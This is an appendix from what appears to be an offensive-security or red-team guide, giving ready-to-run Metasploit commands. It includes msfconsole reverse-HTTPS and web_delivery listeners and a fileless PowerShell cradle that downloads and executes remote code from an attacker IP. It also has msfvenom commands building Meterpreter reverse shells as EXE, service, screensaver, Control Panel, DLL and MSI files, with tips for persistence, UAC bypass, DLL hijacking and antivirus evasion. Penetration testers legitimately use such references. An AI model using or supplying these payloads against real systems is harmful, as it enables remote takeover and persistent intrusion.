Metasploit Payloads
This appendix is a centralized reference for generating Metasploit payloads used throughout this document. All msfvenom commands run on Kali. Each section corresponds to a payload format referenced in a specific technique file.
Listenersβ
Standard Reverse HTTPS Listenerβ
Used for all staged payloads (reverse_https). Run once; it will catch sessions from any payload pointing to the same LHOST/LPORT:
msfconsole -x "use exploit/multi/handler;
set payload windows/x64/meterpreter/reverse_https;
set LHOST 0.0.0.0;
set LPORT 443;
run -j;"
Web Delivery Listener (Fileless PowerShell Cradle)β
Used when you need a PowerShell download cradle instead of a dropped EXE. The module hosts the shellcode stager and generates the PS one-liner to run on the victim:
msfconsole -x "use exploit/multi/script/web_delivery;
set SRVHOST 0.0.0.0;
set SRVPORT 8443;
set SSL true;
set target 2;
set payload windows/x64/meterpreter/reverse_https;
set LHOST 0.0.0.0;
set LPORT 443;
run -j;"
Cleaning up the generated cradle:
The module outputs a PowerShell one-liner like:
powershell.exe -nop -w hidden -e <BASE64>
Or a longer string form:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$Q=new-object net.webclient;IEX $Q.downloadstring("https://0.0.0.0:8443/AbcXyz");
Before embedding in any technique (WMI subscription, Run key, scheduled task), clean it up:
- Replace
0.0.0.0with your actual attacker IP - If using the string form: replace single quotes with double quotes and wrap the whole string in single quotes so it can be stored in a variable or
cmd /cargument - Test the cleaned cradle from a fresh PS window before embedding it in a persistence mechanism
Canonical cleaned form:
'[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$Q=new-object net.webclient;IEX $Q.downloadstring("https://192.168.1.50:8443/AbcXyz");'
This goes into $PS_COMMAND variables throughout the persistence and defense evasion technique files.
EXE Payloadsβ
Standard Reverse HTTPS EXEβ
Used for: BITS Jobs (T1197), Scheduled Tasks (T1053), Startup Folder (T1547.001), Lateral Movement (T1021), Ingress Tool Transfer (T1105)
ATTACKER_IP="<ATTACKER_IP>"
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f exe -o payload.exe
Service-Compatible EXEβ
Used for: Windows Service (T1543.003)
Implements StartServiceCtrlDispatcher so the Service Control Manager can manage the process lifecycle. A standard EXE will fail with "Error 1053" when installed as a service.
ATTACKER_IP="<ATTACKER_IP>"
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f exe-service -o svc_payload.exe
Screensaver / CPL EXE (.scr / .cpl)β
Used for: Screensaver (T1546.002), UAC Bypass via Control Panel (T1548.002)
The file format is identical to a standard EXE - only the extension changes. msfvenom generates a standard EXE; rename or specify the output filename:
# .scr for screensaver persistence
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f exe -o payload.scr
# .cpl for Control Panel UAC bypass
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f exe -o payload.cpl
DLL Payloadsβ
Standard Reverse HTTPS DLLβ
Used for: DLL Hijacking (T1574.001 / T1574.010 / T1574.011), COM Hijacking (T1546.015), IFEO Injection (T1546.012 DLL variant)
ATTACKER_IP="<ATTACKER_IP>"
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f dll -o payload.dll
msfvenom DLL payloads execute their shellcode from DllMain. This means the shellcode runs in the context of whatever process loads the DLL. If that process expects the DLL to export specific functions (e.g., a DLL hijack target that calls GetVersion), the load will succeed and the shellcode will fire, but the host process may crash or hang if the expected export is missing. For DLL hijacking, use a compiled DLL with the correct exports forwarded - see Compiled Payloads - DLL with Export Forwarding.
MSI Payloadsβ
Reverse HTTPS MSI Installerβ
Used for: Ingress Tool Transfer via msiexec /i (T1105)
ATTACKER_IP="<ATTACKER_IP>"
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f msi -o payload.msi
The MSI runs the Meterpreter stager via a custom action during installation. The session arrives during the msiexec /i execution - no separate launch step needed.
Payload Reference Tableβ
| Technique | Format | msfvenom -f flag | Listener type |
|---|---|---|---|
| Run Keys, Scheduled Task, BITS, Startup Folder | EXE | exe | multi/handler |
| Windows Service | Service EXE | exe-service | multi/handler |
| Screensaver | EXE (rename .scr) | exe | multi/handler |
| Control Panel UAC Bypass | EXE (rename .cpl) | exe | multi/handler |
| DLL Hijacking, COM Hijacking | DLL | dll | multi/handler |
msiexec /i download | MSI | msi | multi/handler |
| WMI Event Subscription, Registry Run (fileless) | PowerShell cradle | N/A | web_delivery |
| Regsvr32, Mshta, Wscript (fileless) | PowerShell cradle | N/A | web_delivery |
Common msfvenom Optionsβ
| Option | Values | Notes |
|---|---|---|
-p | windows/x64/meterpreter/reverse_https | Use x64 for modern targets; use windows/meterpreter/reverse_https (no x64) for 32-bit targets only |
LHOST | Your Kali IP | Use the IP reachable from the victim - not 127.0.0.1 or 0.0.0.0 |
LPORT | 443 | Port 443 blends in as HTTPS; ensure your multi/handler listener is on the same port |
-f | See table above | Output format |
-o | Filename | Output file; include the correct extension (.exe, .dll, .msi, .scr, .cpl) |
-e | x64/xor_dynamic | Encoder - reduces AV detection slightly; not a substitute for custom payloads |
-i | Integer | Encoding iterations - e.g., -e x64/xor_dynamic -i 5 |